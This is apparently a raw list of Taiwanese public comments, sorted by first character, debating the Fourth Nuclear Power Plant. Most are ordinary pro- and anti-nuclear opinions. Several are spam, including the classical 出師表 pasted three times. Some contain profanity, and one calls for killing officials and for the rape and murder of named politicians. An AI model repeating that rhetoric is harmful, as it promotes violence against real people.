<br><br>支持臺灣發展風力發電,效法德國成為非核家園。
<br><br>支持潔淨減炭核能,拒絕燒炭自殺!
<br><br>支持廢核!
<br><br>支持廢核
<br><br>支持績建
<br><br>支持續建核四
<br><br>支持繼續建設核四燃料填充,不願意被政客及媒體操控!
<br><br>支持
<br><br>支援使用核四,有關安全請交由專家處理,不要每次遇到選舉就煽動抗爭,社會不能安寧,我們做人民頭腦要清醒一點。
<br><br>支援核四,核二核三可以停止
<br><br>支援核四正常使用不用怕走在路1
<br><br>支援核能,臺灣沒有本錢可以選能源。
<br><br>日本天皇萬歲!
<br><br>日本在福島核能電廠事故後,日本內閣已決定重?核電,因為再也無法承受進口天然氣之高昂價格。而且,台灣是個獨立電網,並未與鄰國電網連接互通有無,根本無條件廢核!
<br><br>日本都不能處處核安問題!台電可以嗎?
<br><br>日本都要再次使用核電,台灣可以不用嗎?現今科技進步的社會,可以不用電嗎?夏天要開冷氣,冬天要開?氣,無時無該都要用電,可有試過完全不用電的過曰子!?台灣現今的問題不是用不用核電,而是豆腐工程,和貪腐的政府官員,藍綠政黨都是一樣,無清流可言!
<br><br>日本電力公司管理都有問題,台灣電力公司管理比他們好嗎?不可能,那就代表台灣發生核災,遲早的事而已。
<br><br>日本福島發生核災,仍然重建核能,為什麼?由此可見核能發電的重要性,在阿扁總統時,停建為何又重新建,經費損失很可怕,今年選舉年,開始拿核能做議題炒作,到底那一個黨怕選輸 ,拿選舉讓費老百姓的納稅錢,真是亂國亂民,太可惡,用選票抵制讓費老百姓納稅錢的那一黨。
<br><br>日Z
<br><br>月營收30億。
<br><br>火力發電,更污染性。
<br><br>火力發電廠不會?染?每日燃燒多少噸的煤能不排二氧化碳嗎?有電當思無電之苦
<br><br>一、建議核四直接廢除、尋找替代能原、例如太陽能、風力發電。
<br><br>一切都是共匪的陰謀
<br><br>一寸光陰一寸金
<br><br>一旦再生能源可以取代則立即廢核電可也。
<br><br>一次核災就能徹底毀滅台灣。所以我要廢除核能發電。
<br><br>一定支持停建!
<br><br>一定要核四的,不然一度電幾百元你用得起嗎?別用電,辦得到嗎?
<br><br>一定要徹底停止核四建設
<br><br>一定要廢核
<br><br>一定要
<br><br>一個林義雄拿2千3百萬經濟利益作要協,什麼東西啊?
<br><br>一堆自以為的大學生和人出來講什麼民主 不是遊遊行霸佔立院就可以解決的 沒核電就等著每個月繳電費就飽了 沒吃過苦在那嘴 草莓族
<br><br>一堆偷工減料工程弊案
<br><br>一萬個支持
<br><br>二、各工廠自己設太陽能、自己使用。
<br><br>人民幸福永續 ‧ 民生倖存永續
<br><br>人民苦的是雙漲納稅
<br><br>人民真的知道廢除核四後果嗎?海峽對面那麼多核電廠要如何來廢?
<br><br>人民
<br><br>人有先知先覺,後知後覺,不知不覺的人太多了,跟本大部份的人是牛頭班,烏合之眾,豈知好壞。
<br><br>人命大於經濟
<br><br>人們不管是在生活上經濟活動上,都與電脫離不了幹係,我能理解反核民眾們的擔憂,但我們需要認清事實,台灣真的不大也不像中東地底下有挖不完的石油亦或是俄羅斯有天然氣可以直接轉能源使用,主張反核四的人們,「電」不會無中生有,你擔心核廢料造成往後的安全問題,那你有沒有想過沒有核四的問題,不管哪種行業多半需要電,成本增高、利潤降低,這些損失的部分,業者是會自行吸收?還是反應在往後商品價格上?或妳是做小型生意的,電價高漲,成本增加,須將售價提升才能達到之前的利潤,但售價上漲後,你單品利潤沒有以前高,但卻賣得比以前差,漲東漲西的但你的收入卻越變越少,一代比一代更難生活,難道這些也不視為一種危機嗎?
<br><br>人要活著有意義,不安全的不要拿來,讓出生一些畸形兒,造孽。
<br><br>人家廢核是因為有其他能源可以替代
<br><br>人家賺你的錢,叫做欺人太甚。
<br><br>人家讓你賺錢,叫做收買人心。
<br><br>人類生存價值在於正常無污染源下的環境才叫作人類的正常延續
<br><br>人類真的無法掌控所有事件,說「人無所不能」,是那位人兄剛剛過了自己的關卡,就這樣!
<br><br>人類慾望太大,導致需求無止盡,回歸自然,才不會自我毀滅
<br><br>大家有大家的思想民主咩
<br><br>大家抗議服貿、抗議核四
<br><br>大家挺核,解救人民!
<br><br>大家都去接打雷好了啦
<br><br>大家都喊停 沒人談配套 經濟已經差 電價如何漲 溴養層已破 回復不容易
<br><br>大陸沿海也一堆核電場那麼靠近台灣有差嗎
<br><br>大陸員工薪資持續升高,將來企業必定回流,外資也將湧進,自由行再開放更多,電將不夠用,核四爆不爆,人在做,天在看,若活在蓬萊仙島的台灣不惜福,天不用核爆也會把您滅了。
<br><br>小小台灣
<br><br>小小的台灣,萬一核子爆炸,我們的子孫,何去何???了政黨的利益,害了我們的子孫,該下地獄。
<br><br>小小的台灣島不需要四座核電廠
<br><br>小島台灣經不起一次的核災!這是永續經營台灣必須看到的風險。不用核電的能源政策,也是一種國家轉型與經濟實力!
<br><br>又是一場政客鬧劇?
<br><br>又是綠的再拿國家經濟來當選舉抄做
<br><br>又要馬兒好,又要馬兒不吃草,怎可能?所以核四要建。
<br><br>又停又建,台電偷工減料,人命不可開玩笑!
<br><br>三小
<br><br>工業用電何處來
<br><br>下臺!下臺!
<br><br>已不破壞大自然為原則!!
<br><br>上一次的內容題目寫的太深奧,對於
<br><br>已有核一、二、三廠了~請問核四有差嘛~那些反核的人是都不用用電的嗎?真的有用蠟燭過生活的人才有資格說反核~何必自命清高呢?
<br><br>上次電費2階段漲價政府就被罵得要死,廢核四引起的物價上漲我不相信這些廢核的人能接受.只為反對而反對的人是不可能提出正面方法與思考的人,只會丟出問題要別人解決,台灣就是被這些只知享受不願犧牲的人給推到亡國的地步.
<br><br>已投資很多錢利大於幣關舊廠新廠要完成
<br><br>已花了好幾千億就要使用;但不要再增建了。
<br><br>上個月底臺北市副市長張金鶚,拜會財政部長張盛和,展開「雙張會」,兩人要共商打房大計,張金鶚還喊出,房市2年內要消風3成,這讓前總統李登輝,忍不住要開砲。
<br><br>上街遊行的人都是重複人員,沒那麼多人認同。
<br><br>已經花那麼多錢蓋核四應先運做等找到新替代能源再停
<br><br>已經花費這麼多經費,且核能是最環保的電能。全力支持完成並發電運轉。不要聽可惡政客的謬論。
<br><br>已經建了就誏它完成,空前?後,堅決反對後續再建
<br><br>已經發費3000多億了,就把核四嚴格把關做到滴水不漏,最嚴格品檢,往後不再蓋核五,發展綠能,才有競爭力,台灣沒有資源,只有靠經濟工業發展。
<br><br>丫扁當年為何停了又覆蓋!
<br><br>凡事都要別人保護
<br><br>凡是利大於弊時,Do it !
<br><br>也可以救國內的先進照明工廠
<br><br>也只希望大家看到的多一點
<br><br>也多捐些錢幫忙罷免馬英九
<br><br>才能幸福
<br><br>平常鋪鋪馬路蓋蓋公共地下停車場就算了,核四也這樣搞啊!?
<br><br>必須要有的
<br><br>必須要有省電配套。依目前的用電習慣不可能做到無核環境。
<br><br>必須做好完備的安全措失及告知人民核四建構符合國際標準,聘請專業技師維護運轉安檢,無在野黨所言的偷工減料,以「日本福島」為前車之鑑。
<br><br>未來的替代能源在哪!?
<br><br>未和沒票數統計明細,抄作行為?
<br><br>未曾瞭解核四,怎敢妄言廢核
<br><br>正務官若不貪汙
<br><br>正道與中道,要站出來吧!
<br><br>民主不該是,不合私人的意見就揪眾上街頭
<br><br>民眾也想停建核四、那得有替代能源、在此之前它還是最佳的能源選擇。
<br><br>民進黨亂了二十多年沒有進步,更使台灣經濟衰退,只想奪政權標工程A錢,分化族群,怎能走向地球村,心態卑劣怎能談環保,心理都骯髒,世界大同才有國際觀。
<br><br>生命受到威脅
<br><br>生活總是要用電,現在反對廢核,到時候引起限電,誰來負責
<br><br>用再多的錢也無法處理核廢料
<br><br>用安全又環保的方式愛台灣及愛地球。
<br><br>用短訊還不如用line or we chat 來的快些,廣大!
<br><br>用新去舊
<br><br>用電是必須的~台灣不可能不建~
<br><br>用電是首要目的,沒有它未來台灣的產業何去何從,民生用電需要量大,即便不吹冷氣、風扇,也不夠啊;拜託別再抗爭了,我們的後代子孫需要安全、安靜的環境及社會!
<br><br>由此可証
<br><br>目前以臺灣來講核能發電的校率跟電費的多寡應該遠比其它發電方式來的好吧?反觀風力發電雖然環保但是夠用嗎?反核反對的只是不願意建在自家週邊的話,那其實很狹隘的反對吧?民眾真的有去明白嗎?如果要建在我家附近我願意阿,為什麼願意其實明眼人都知道吧?
<br><br>目前代替能源未成熟,不合適停建,各位不要再鬧了!
<br><br>目前核一核二核三都不夠新 核四不蓋?
<br><br>目前核四還是較乾淨能源
<br><br>目前核能發電仍是最乾淨/最經濟的,除非已找到比核能更不會污染又經濟的替代能源,不應輕言廢核。
<br><br>目前廢除核四,又沒實足電廠替代能源,更已支出那麼龐大資金,停又建,建又停,耗費這麼大工程,已屆運轉又將它廢除,少數人民抗爭就停止運作,真是把國家重要工程當成兒戲,全民悲哀。(當初立法怎麼通過)
<br><br>任何設備設施都有危險性但是只要管理得當或小心謹慎的管理就可以,不要只
<br><br>先找出替代能源再廢核吧!
<br><br>先國家人民經濟強盛,像德國那麼有錢,才來停止核四,才不會影響到生活嘛
<br><br>先進國考慮再開啟核能政策一定有原因,看廢過的國家結果是如何?代價、反應是如何?重點是核安,科技上這麼多年來也進步不少,核安也有新的成就,台灣不能缺電,等缺電再找電?不是現在這競爭高速時代該有的邏輯,多的電還可以賣到對岸,增加對岸對台灣的合作性,對台灣安全也是有益的。
<br><br>先進國家投入替代能源研發的經費
<br><br>先談核安再?存?,只論存廢乃危言聳聽不負責任之 說法
<br><br>先整頓台電公司,我們要知道電力供應真相,不要黑箱
<br><br>先讓核四運轉,
<br><br>全力支持先把核四蓋好運轉
<br><br>全力支援台灣的發展,需要核四來完成。
<br><br>全力發展清潔能源!別只想撿人現成!其時早有現成!卻不懂取經鑽研!台灣只有一個!不是兩黨爭的家產!別妄想以後科技發達再處理善後..地球不會等你..樹欲靜而風不止..錢沒了懂得人可以印..就怕台灣沒人懂?
<br><br>全民公投才是最準確
<br><br>全民節約用電共同保護台灣
<br><br>全世界那麼多核電廠在運作,台灣的能力沒有那麼遜,不用自己嚇自己
<br><br>全世界沒有一個國家要核能!但為什麼廢不了?核能要廢要有配套方案,除了全民節電還要建立大量替代能源,替代能源是不包含台灣現在70%的火力發電!聽聽其他聲音,像德國那樣朝廢核邁進!
<br><br>全面反核
<br><br>全面去核
<br><br>全面廢核!
<br><br>全面廢核
<br><br>全面癈止核能發電
<br><br>全球先進國家都在使用安全 撿查合格核能電廠
<br><br>全部停大家來種田,包括核一二三。
<br><br>世界的競爭靠實力,不是靠嘴巴,沒有替代方案,不要拿來玩,國家快被玩掉了,還在玩。很無知?!
<br><br>世界能源危機及早因應。
<br><br>以上希望林聖人立即帶頭力行,馬政府並立即宣佈廢止核四,全國人民立即停止爭議吧!
<br><br>以目前核一二核災應變計劃的粗糙不確實,不敢相信核電廠在台灣的存在是相對性的安全。
<br><br>去包圍這些反對的
<br><br>去找這些團體,
<br><br>去你媽的馬英九下三爛王八蛋,整個國民黨都是垃圾混帳窩囊廢,核四到底收了多少回扣阿?這種垃圾官員人人都見到都可以殺,這馬英九江宜樺被姦殺個幾百次都不夠彌補台灣!幹!
<br><br>去你媽的
<br><br>以前反對,現在也反對。
<br><br>以前還沒有iPhone 更別提運端?科技進步不是當然可比擬!
<br><br>以經有三座核電場了
<br><br>以經濟考量台灣的前途吧!
<br><br>以綠色替代能源取代,並在高鐵、高速公路、台鐵周圍安裝太陽能板!
<br><br>去瞭解一下吧!
<br><br>可不可以有其它選擇?我不反核,但是要有嚴格的核安!
<br><br>可不可以 蓋核四 關閉核一核二?
<br><br>可以仿效歐洲建設綠能發電
<br><br>可以有更建設性的建議嗎?大家說停核四,確不談如何找尋替代方案,多年前因有核電經濟起飛,今天確因吃飽而反核電,實在不懂
<br><br>可以告訴我哪個先進國家沒有核能發電廠嗎?重點是安全配套是否做好吧!
<br><br>可以沒有電!也不能毀了自己家園
<br><br>可以建太陽能、風力、水力、天然氣、潮汐發電丫!有那多發電方式為什麼還要選核電呢!
<br><br>可以廢,但請想出具體替代方案
<br><br>他們完全沒核電廠嗎?
<br><br>他馬的別亂寄東西。
<br><br>叫他們給你一個公道。
<br><br>另一方面,就連有產階級也要受害,根據統計國內自用住宅比率高達85%,如果房價掉3成,以臺北市均價每坪60萬來計算,30坪的自用住宅,原本資產1800萬,消風3成,資產立即蒸發540萬元。
<br><br>另一選項,暫停,留給後代一個選擇的機會
<br><br>只有2種選擇嘛?完工不運作 相較賠違約金是否比較划算呢?
<br><br>只是有的比較會作秀
<br><br>出車禍不開車,拉肚子不吃飯,你們不用電嗎
<br><br>出事絕對死人民,官先走
<br><br>出現這種數據我覺得臺灣...很多人都沒救了
<br><br>台電目前想採取核廢料處理外包,就是拿稅金去卸責
<br><br>台電自己不投入發電,只是廣向民間購電,高價圖利廠商再轉嫁人民買單,如此作法何需核四!
<br><br>台電要改革,破產重新開始。天然氣頁岩氣價格降可取代核電。台電管理有問題核廢料是難題這些要先討論
<br><br>台電要徹底改頭換面從新選擇發電效率。萬一核電廠像日本或蘇聯來一次,那麼我們寶島台灣可經不起衝擊
<br><br>台電經營有問題
<br><br>台電弊案才是電費漲價原頭
<br><br>台獨前不著村後不著店沒其它資源可援助。
<br><br>台灣不是不能走無核家園
<br><br>台灣不能和有土地撤退的國家比
<br><br>台灣不適合!太多弊端
<br><br>台灣太小爆了就沒路了
<br><br>台灣一大半電力都是核能在撐
<br><br>台灣土地太小不能有萬一
<br><br>台灣土地太小沒有辦法承受任何一個核電廠出事因為影響二千三百萬老百姓億萬年的生活及生存太深遠了沿海水食物鏈病痛將在台灣成循環
<br><br>台灣土地面積狹小,人口密集,又處在地震帶,不宜建核能廠。
<br><br>台灣人,沒辦法節約能源
<br><br>台灣人不要又要嫌東嫌西又要什麼都不用付出啦!
<br><br>台灣人民要惜福,快拼經濟吧
<br><br>台灣人真有趣
<br><br>台灣本地能自己生產的電能 幾乎是無 風力水力都無法提供這麼多的電力給我們
<br><br>台灣目前沒有缺電問題,工商業均萎縮,?濟問題令人憂慮,主要問題不在電力,而在政府能力與民心!台灣綠能產業應當趁此時機大力加強,由政府帶領進行全面改革,使台灣在全球變成一個完全無?染的美麗寶島,大家都想來此一遊的寶島!
<br><br>台灣只有一個,我是基層。
<br><br>台灣只有一個,雖電費會上漲一些,但可算是買保險。另外加強台電的管理及採購,也會對降低電力價格有所幫助。
<br><br>台灣只走代工這種低進爭性的經濟方向
<br><br>台灣加油
<br><br>台灣地區太小,不幸核災,真的沒退路
<br><br>台灣地區太小,無處可逃,萬一出事,又東北季風強 ,吹向大台。 請留下一塊安全土地給子孫
<br><br>台灣地質不適合在興建核四,改用太陽能來取代核四。
<br><br>台灣那麼小
<br><br>台灣那麼的小、不能有一點點核安問題
<br><br>台灣沒本錢停建核四
<br><br>台灣沒有如同德國強大的經濟基礎、癈核時又有配套綠能產業政策(包括向法國買核能發出的電力),只要核一除役開始限電,夏天一到、大家再來公投要不要癈核!
<br><br>台灣沒有核電,經濟發展從何來,有錢人廢核,小老百姓撐的住電費持續上漲嗎? 全世界有幾個國家廢核也不想想,台灣有條件嗎?全部人都回60年代生活有幾個願意???
<br><br>台灣沒有能力處理核廢料,核廢料的處理將會是下一個問題
<br><br>台灣沒有資源,只能靠自己發電。在電力充足的情況下,核一,核二,核三,要準時對役。
<br><br>台灣沒能源,只能仰賴核能火力水力風力
<br><br>台灣呢?
<br><br>台灣的土地太小了,大家耍往那裡往
<br><br>台灣的地就那麼大一點點!禁不起一點點的意外!雖然比較省一丁點錢但沒有命可以花也沒用
<br><br>台灣的災難啊喲
<br><br>台灣的教育只教出了一堆沒有目標的青年
<br><br>台灣長久,勿遺害子孫
<br><br>台灣很小,就3個核場,若意外發生,能和日本一樣有地方逃嗎?而且核4的來源,亂七八槽,啟動後發生危險一定超大。
<br><br>台灣很小又珍貴,不能任意破壞。
<br><br>台灣是地震帶,隨時有核爆的危險
<br><br>台灣要自己救!
<br><br>台灣要向前進,改開發取代核電的能源,才是重點。
<br><br>台灣核能已經運作三,四十年也享受利益帶來經濟力量,世界上已開發國家沒有核能有嗎?為何要將台灣經濟實力降低,無核後是否世界上也將無台灣,任何能源都會帶來地球傷害,祗是如何選擇對於台灣最有利
<br><br>台灣處於地震帶,不怕一萬只怕萬一,一但發生災變,生命財產全部化為烏有,還不覺醒要讓後代子孫承受那萬劫不覆的災難於心何忍,不用擔心高電價台灣人有足夠的智慧去承擔。
<br><br>台灣這個沒資源的國家
<br><br>台灣這塊土地固然重要,但民生生活更重要!如果沒了核四電費漲,其它也會跟著漲!沒了電也不會有投資客想投資台灣!失業率又會在提高
<br><br>台灣這種小地方人力資源怎麼跟其他國家比
<br><br>台灣就那麼小 核四?經濟影響會很大 但是沒人可以擔保未來會如何 我想與其如此 不如想想其他替代能源方案吧 為了下一代 讓我們一起加油
<br><br>台灣無能力處理核廢料和核變
<br><br>台灣發展太陽能發電最合適,乾淨,又可以發展民間產業,但執政者偏不要,因為沒有錢可A。
<br><br>台灣發展各種再生能源比任何外國容易例如設備,環境均優於外國,唯一缺少的是國民黨政府的心!缺電是騙人的把戲!好好拿出良心吧?
<br><br>台灣經濟發展要靠電,台灣缺天然資源,煤和天然氣又對氣候暖化不利,核電只好兩害相權取其輕。核電要落實安全管理,如同飛行安全。
<br><br>台灣經濟體質不容考驗!核四設置的配套措施當然必須有嚴謹的規範,然不能因風險而裹足不前,有因噎廢食之嫌!
<br><br>台灣禁不起任何核安傷害!影響經濟發展是藉口。為後代子孫及這快寶島土地做出最勇敢及最正確的決定,徹底停止核四建設!
<br><br>台灣電力不穩定
<br><br>台灣綠色能源很多,只是沒善加利用!
<br><br>台灣需要的是環保能源!核能只是治標不治本~
<br><br>台灣需要新能源政策跟思維.........因為我們經不起一次的意外.....
<br><br>台灣應該發展新的代替能源,別老是提著錢進去燒呀!
<br><br>加油!核四
<br><br>加油!
<br><br>加油啊 狗冥黨必勝
<br><br>加油 好嗎
<br><br>加油 臺灣
<br><br>四座核電太不合理
<br><br>外行閉嘴!
<br><br>外商不進來投資,出囗又不好到時又缺電那台灣真的就沒救了,加油!加油!
<br><br>早就要停建,把心力花在經濟上吧
<br><br>有太陽能、風力等綠能發電可以選擇
<br><br>有好有壞既然人民都說不要何必硬要建呢
<br><br>有利有弊,不然全世界早停止使用核電。電費漲,公司工廠食衣住行娛樂行業成本增加,老闆不賺錢,減薪裁員...。蓋又怕爆,大家都怕死...反正決定後大家就不要怪來怪去
<br><br>有些意外是會遺憾終生
<br><br>有相對安全之前提下支持核四商轉並將其餘核電廠至其使用壽命後停役
<br><br>有個日本範本給全世界看了!我們台灣人想跟日本一樣是嗎?還是不見棺材不掉淚?
<br><br>有效嗎?
<br><br>有核四,國家才有競爭能力。
<br><br>有核安就支持核能發電
<br><br>有核安 才有核4
<br><br>有核讓人憂心沒核讓人安心
<br><br>有條件支持,停建要有替代方案,建好,暫時不商轉。
<br><br>有得必有失!
<br><br>有這些錢為什麼不去研究
<br><br>有廢核的準備嗎?廢核後的取代能源是甚麼?優缺點是什麼?講清楚!
<br><br>有學識有判斷能力的人卻畏於抗議群眾而眼看政府被迫妥協造成國家龐大損失於不顧,台灣終將走上(裂幣驅逐良幣)的下場!
<br><br>有點質感好嗎?怕全天下的人不知道你是KMT嗎?
<br><br>有關於核四謠言太多,核四實際上比核一二三甚至日本的都安全許多。
<br><br>江奎說慌,朋友在裡面做消息確定是馬下令六月運轉
<br><br>污染?危機未到先被你們嚇死!大家?賺不到錢!可小眾人卻企圖利用媒體力量,發佈不實言論,誤導民眾。為何賺不了錢?無知者所做,所?,都讓想投資台灣者怯步,(年輕人們,你們知道你們反的是你們自己的未來嗎?要放開心胸把飯碗做大?還是要可憐巴巴要求政府要有作為!可是當政府要做事時,你們又要求政府不要這樣,不要那樣!這不是很奇怪?試問自己:我們自己到底要的是什麼?便宜的電?貴的電?你能付擔貴的電?其它貧困的人呢?
<br><br>考量能源穩定供應與電價合理性, 支持核四儘早完工運轉。
<br><br>而且承包商換過這麼多次,又出過這麼多包
<br><br>而是安檢審核的過程
<br><br>而是要有一貫的目標
<br><br>臣亮言:先帝創業未半,而中道崩殂;今天下三分,益州疲敝,此誠危急存亡之秋也。然侍衛之臣,不懈於內;忠志之士,忘身於外者:蓋追先帝之殊遇,欲報之于陛下也。誠宜開張聖聽,以光先帝遺德,恢弘志士之氣;不宜妄自菲薄,引喻失義,以塞忠諫之路也。宮中府中,俱為一體;陟罰臧否,不宜異同:若有作奸犯科,及為忠善者,宜付有司,論其刑賞,以昭陛下平明之治;不宜偏私,使內外異法也。侍中、侍郎郭攸之、費依、董允等,此皆良實,志慮忠純,是以先帝簡拔以遺陛下:愚以為宮中之事,事無大小,悉以諮之,然後施行,必得裨補闕漏,有所廣益。將軍向寵,性行淑均,曉暢軍事,試用之於昔日,先帝稱之曰“能”,是以瀧議舉寵?督:愚以為營中之事,事無大小,悉以諮之,必能使行陣和穆,優劣得所也。親賢臣,遠小人,此先漢所以興隆也;親小人,遠賢臣,此後漢所以傾頹也。先帝在時,每與臣論此事,未嘗不歎息痛恨於桓、靈也!侍中、尚書、長史、參軍,此悉貞亮死節之臣也,願陛下親之、信之,則漢室之隆,可計日而待也。臣本布衣,躬耕南陽,苟全性命於亂世,不求聞達于諸侯。先帝不以臣卑鄙,猥自枉屈,三顧臣於草廬之中,諮臣以當世之事,由是感激,遂許先帝以驅馳。後值傾覆,受任於敗軍之際,奉命於危難之間:爾來二十有一年矣。先帝知臣謹慎,故臨崩寄臣以大事也。受命以來,夙夜憂慮,恐付託不效,以傷先帝之明;故五月渡瀘,深入不毛。今南方已定,甲兵已足,當獎帥三軍,北定中原,庶竭駑鈍,攘除奸凶,興複漢室,還於舊都:此臣所以報先帝而忠陛下之職分也。至於斟酌損益,進盡忠言,則攸之、依、允等之任也。願陛下托臣以討賊興複之效,不效則治臣之罪,以告先帝之靈;若無興複之言,則責攸之、依、允等之咎,以彰其慢。陛下亦宜自謀,以諮諏善道,察納雅言,深追先帝遺詔。臣不勝受恩感激!今當遠離,臨表涕泣,不知所云。臣亮言:先帝創業未半,而中道崩殂;今天下三分,益州疲敝,此誠危急存亡之秋也。然侍衛之臣,不懈於內;忠志之士,忘身於外者:蓋追先帝之殊遇,欲報之于陛下也。誠宜開張聖聽,以光先帝遺德,恢弘志士之氣;不宜妄自菲薄,引喻失義,以塞忠諫之路也。宮中府中,俱為一體;陟罰臧否,不宜異同:若有作奸犯科,及為忠善者,宜付有司,論其刑賞,以昭陛下平明之治;不宜偏私,使內外異法也。侍中、侍郎郭攸之、費依、董允等,此皆良實,志慮忠純,是以先帝簡拔以遺陛下:愚以為宮中之事,事無大小,悉以諮之,然後施行,必得裨補闕漏,有所廣益。將軍向寵,性行淑均,曉暢軍事,試用之於昔日,先帝稱之曰“能”,是以瀧議舉寵?督:愚以為營中之事,事無大小,悉以諮之,必能使行陣和穆,優劣得所也。親賢臣,遠小人,此先漢所以興隆也;親小人,遠賢臣,此後漢所以傾頹也。先帝在時,每與臣論此事,未嘗不歎息痛恨於桓、靈也!侍中、尚書、長史、參軍,此悉貞亮死節之臣也,願陛下親之、信之,則漢室之隆,可計日而待也。臣本布衣,躬耕南陽,苟全性命於亂世,不求聞達于諸侯。先帝不以臣卑鄙,猥自枉屈,三顧臣於草廬之中,諮臣以當世之事,由是感激,遂許先帝以驅馳。後值傾覆,受任於敗軍之際,奉命於危難之間:爾來二十有一年矣。先帝知臣謹慎,故臨崩寄臣以大事也。受命以來,夙夜憂慮,恐付託不效,以傷先帝之明;故五月渡瀘,深入不毛。今南方已定,甲兵已足,當獎帥三軍,北定中原,庶竭駑鈍,攘除奸凶,興複漢室,還於舊都:此臣所以報先帝而忠陛下之職分也。至於斟酌損益,進盡忠言,則攸之、依、允等之任也。願陛下托臣以討賊興複之效,不效則治臣之罪,以告先帝之靈;若無興複之言,則責攸之、依、允等之咎,以彰其慢。陛下亦宜自謀,以諮諏善道,察納雅言,深追先帝遺詔。臣不勝受恩感激!今當遠離,臨表涕泣,不知所云。臣亮言:先帝創業未半,而中道崩殂;今天下三分,益州疲敝,此誠危急存亡之秋也。然侍衛之臣,不懈於內;忠志之士,忘身於外者:蓋追先帝之殊遇,欲報之于陛下也。誠宜開張聖聽,以光先帝遺德,恢弘志士之氣;不宜妄自菲薄,引喻失義,以塞忠諫之路也。宮中府中,俱為一體;陟罰臧否,不宜異同:若有作奸犯科,及為忠善者,宜付有司,論其刑賞,以昭陛下平明之治;不宜偏私,使內外異法也。侍中、侍郎郭攸之、費依、董允等,此皆良實,志慮忠純,是以先帝簡拔以遺陛下:愚以為宮中之事,事無大小,悉以諮之,然後施行,必得裨補闕漏,有所廣益。將軍向寵,性行淑均,曉暢軍事,試用之於昔日,先帝稱之曰“能”,是以瀧議舉寵?督:愚以為營中之事,事無大小,悉以諮之,必能使行陣和穆,優劣得所也。親賢臣,遠小人,此先漢所以興隆也;親小人,遠賢臣,此後漢所以傾頹也。先帝在時,每與臣論此事,未嘗不歎息痛恨於桓、靈也!侍中、尚書、長史、參軍,此悉貞亮死節之臣也,願陛下親之、信之,則漢室之隆,可計日而待也。臣本布衣,躬耕南陽,苟全性命於亂世,不求聞達于諸侯。先帝不以臣卑鄙,猥自枉屈,三顧臣於草廬之中,諮臣以當世之事,由是感激,遂許先帝以驅馳。後值傾覆,受任於敗軍之際,奉命於危難之間:爾來二十有一年矣。先
<br><br>自由能源技術已經成熟
<br><br>自立自強經濟發展鞏固實力
<br><br>自古改朝換代都是因民怨太深!
<br><br>至少他不啟用用來產電
<br><br>住在那邊的民眾怎麼辦
<br><br>但不反對核電
<br><br>但是全民需有共識,在廢核後生活增加電費,不要再為電費問題吵吵鬧鬧。
<br><br>但是眼不見為淨
<br><br>但是話說回來
<br><br>但這種官商勾結下的問題核四
<br><br>地小人稠,核災無法承受!核廢料無能力處理,對環境影響太大!
<br><br>再生能源受天候影響,而燃煤又會增加二氧化碳?二氧化硫等溫室氣體之排放,油價、天然氣又過於昂貴,因此核能是唯一的選擇。
<br><br>再生能源建置才是永久之計。
<br><br>再來說說服貿
<br><br>再者,大多的人民對於核能方面又不是專業人士,為什麼不多聽聽專業人士的看法再去做結論?專業人士瞭解的會比我們少嗎?請再好好想想吧
<br><br>地域上核四也比金山北海岸離開臺北人口密集區遠,安全度也高得多不是嗎?
<br><br>地球人求生存
<br><br>再發我就報警!
<br><br>在日本、新加坡、許多政策都是跨越10年、二十年,不會因為政黨不同就亂用行政命令修改,政治是一時的、國家發展是永遠的,公民們覺醒吧!
<br><br>在七月會有台電舉辦的核能營,對核能有質疑的都可以參加,要大家學以上
<br><br>在台電高層的都是清大核工的,為了自身利益,永遠不去思考其他能源的可行性,30多年來毫無進步,永遠是同一套說詞,實在很可笑!眼中只有核電,花大錢用盡一切資源宣傳核電,?謊、封殺反對意見,看在納稅人眼裡實在很痛心~
<br><br>在台灣還沒有替代能源計畫時核四還是有必要
<br><br>在安全專業控管下支持核四。
<br><br>在完善的建造太陽能發電或是風力發電技術前,我認為核四是目前全名最重要的電力來源!
<br><br>在找到可行的替代能能源前,核電應該是相對乾淨安全的能源
<br><br>在使用這樣子機制時,應該明確證明此次投票之信度與效度,以免混亂視聽。
<br><br>在來談核四!
<br><br>在沒有有效的替代能源前,我會支援繼續使用能發電
<br><br>在沒有完整的能源發展政策及配套措施前,說停就停,影響甚?,公投前應辦正反兩造說明會和辯論會,不能兒戲,不能忽略盲從傷害的可能性
<br><br>在沒有找到可替代的方案前、只有核電才能維持住目前的電價,昂貴的電價將不利於台灣的經濟發展。沒有了經濟,混亂的政治將使台灣人民陷於更悲苦的處境。
<br><br>在沒有取代反核方案之前、本人反反核。因為我們無法面對生活開銷暴漲!
<br><br>在沒有替代方案而且又花費近兆台幣之後停建,損失之大無法想像!
<br><br>在沒有替代能源比核能發電有效益時,核四需興建,但需做好核安
<br><br>在這個發展時代現在都提倡環保。現在已經有光能量傳電了還建那核四來毀滅臺灣嗎?
<br><br>危害下一代子孫!
<br><br>好
<br><br>如此能催促替代能源的產生
<br><br>如此簡單的邏輯,任何有理性的人都看得懂的。
<br><br>同步尋找替代能源
<br><br>如沒有確實、實用的替代方案,廢核四只是為反對而反對,其他的替代能源的開發要多久要多少錢,來的及應付我們的需要嗎,萬一開發沒成功所花的金錢和成本還不是全民買單,核爆是天災誰也不願會發生,難道怕噎死就不吃東西嗎!我們要相信技術會越來越進步,難道大家可以對電的需求越來越少嗎?我相信所有人相權衡下還是需要電吧!像日本發生核災還不是繼續蓋核電廠,他們比我們更有切身之痛,難道他們會比我們不想找出替代能源嗎?
<br><br>如果不能把核廢料賣俄羅斯那就不該繼續但是如果可以賣俄羅斯那就請國外廠商來把核四完成吧!
<br><br>如果不蓋核四電費不漲就好了!我怕電費呀,畢竟現在科技發達到處都要電
<br><br>如果台灣不要核能全世界也應該廢核能啊
<br><br>如果有考慮到這點那麼有建設性的方案就要多想台灣是否試合不要把別的國家的事情如法炮製在不試合實施的土地上
<br><br>如果有替代方案,贊成停建
<br><br>如果有穩定的?能源那麼家家?戶自己安裝(如太陽?)不用看臺電臉色則台電就倒了根本不用去談核能或者火力,但是你說可能嗎?我只要用電但是變電箱不要設在我家附近心態才是問題。
<br><br>如果同意建核四的人全部移居核四週邊長住、那我就無話可說!
<br><br>如果你做老闆你不是這樣
<br><br>如果沒有核電我們以後要靠什麼?像日本本來是封存現在也開封,不然電會不夠也會漲價。
<br><br>如果政府不補助家家戶戶裝設太陽能發電就得支持核四
<br><br>如果要廢核四,就不要再說為何經濟如此糟糕,政府沒做事這些話。
<br><br>如果要廢請提供更好的替代方式
